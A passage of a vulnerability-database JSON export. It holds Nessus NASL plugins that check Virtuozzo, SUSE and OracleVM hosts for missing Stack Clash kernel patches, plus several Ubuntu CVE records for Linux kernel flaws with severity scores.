["p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel", "cpe:/o:virtuozzo:virtuozzo:6"], "id": "VIRTUOZZO_VZA-2017-055.NASL", "href": "https://www.tenable.com/plugins/nessus/101052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101052);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000364\"\n );\n\n script_name(english:\"Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-055)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerability :\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on\n the system. This is a kernel-side mitigation which\n increases the stack guard gap size from one page to 1\n MiB to make successful exploitation of this issue more\n difficult.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2830102\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected parallels-server-bm-release / vzkernel / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"parallels-server-bm-release-6.0.12-3680\",\n \"vzkernel-2.6.32-042stab123.8\",\n \"vzkernel-devel-2.6.32-042stab123.8\",\n \"vzkernel-firmware-2.6.32-042stab123.8\",\n \"vzmodules-2.6.32-042stab123.8\",\n \"vzmodules-devel-2.6.32-042stab123.8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"parallels-server-bm-release / vzkernel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:18", "description": "This update for the Linux Kernel 3.12.61-52_66 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1924-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1924-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101927", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1924-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101927);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1924-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_66 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171924-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?83674c49\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1195=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1195=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_66-default-5-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_66-xen-5-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:50", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - mm: fix new crash in unmapped_area_topdown (Hugh Dickins) [Orabug: 26326143] (CVE-2017-1000364)\n\n - mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: 26326143] (CVE-2017-1000364)", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0115) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0115.NASL", "href": "https://www.tenable.com/plugins/nessus/101140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0115.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101140);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0115) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - mm: fix new crash in unmapped_area_topdown (Hugh\n Dickins) [Orabug: 26326143] (CVE-2017-1000364)\n\n - mm: larger stack guard gap, between vmas (Hugh Dickins)\n [Orabug: 26326143] (CVE-2017-1000364)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2017-June/000743.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-94.3.7.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-94.3.7.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2023-05-27T13:49:33", "description": "An issue was discovered in the Linux kernel through 4.17.10. There is a\nNULL pointer dereference in fscrypt_do_page_crypto() in fs/crypto/crypto.c\nwhen operating on a file in a corrupted f2fs image.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | The affected user base for this issue is likely small since f2fs is not the default filesystem and it is not widely used in Ubuntu\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-27T00:00:00", "type": "ubuntucve", "title": "CVE-2018-14616", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14616"], "modified": "2018-07-27T00:00:00", "id": "UB:CVE-2018-14616", "href": "https://ubuntu.com/security/CVE-2018-14616", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-27T14:03:54", "description": "The nfnetlink_rcv_batch function in net/netfilter/nfnetlink.c in the Linux\nkernel before 4.5 does not check whether a batch message's length field is\nlarge enough, which allows local users to obtain sensitive information from\nkernel memory or cause a denial of service (infinite loop or out-of-bounds\nread) by leveraging the CAP_NET_ADMIN capability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support \n[sbeattie](<https://launchpad.net/~sbeattie>) | requires CAP_NET_ADMIN to exploit\n", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.0, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-11-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-7917", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7917"], "modified": "2016-11-16T00:00:00", "id": "UB:CVE-2016-7917", "href": "https://ubuntu.com/security/CVE-2016-7917", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:03:53", "description": "The __ext4_journal_stop function in fs/ext4/ext4_jbd2.c in the Linux kernel\nbefore 4.3.3 allows local users to gain privileges or cause a denial of\nservice (use-after-free) by leveraging improper access to a certain error\nfield.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-16T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8961", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8961"], "modified": "2016-11-16T00:00:00", "id": "UB:CVE-2015-8961", "href": "https://ubuntu.com/security/CVE-2015-8961", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:01:25", "description": "The LLC subsystem in the Linux kernel before 4.9.13 does not ensure that a\ncertain destructor exists in required circumstances, which allows local\nusers to cause a denial of service (BUG_ON) or possibly have unspecified\nother impact via crafted system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-6345", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6345"], "modified": "2017-03-01T00:00:00", "id": "UB:CVE-2017-6345", "href": "https://ubuntu.com/security/CVE-2017-6345", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-26T14:38:08", "description": "Buffer overflow in the oz_cdev_write function in\ndrivers/staging/ozwpan/ozcdev.c in the Linux kernel before 3.12 allows\nlocal users to cause a denial of service or possibly have unspecified other\nimpact via a crafted write operation.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1249272>\n", "cvss3": {}, "published": "2013-11-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4513", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4513"], "modified": "2013-11-12T00:00:00", "id": "UB:CVE-2013-4513", "href": "https://ubuntu.com/security/CVE-2013-4513", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-27T14:07:22", "description": "The aiptek_probe function in drivers/input/tablet/aiptek.c in the Linux\nkernel before 4.4 allows physically proximate attackers to cause a denial\nof service (NULL pointer dereference and system crash) via a crafted USB\ndevice that lacks endpoints.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1555865>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T00:00:00", "type": "ubuntucve", "title": "CVE-2015-7515", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 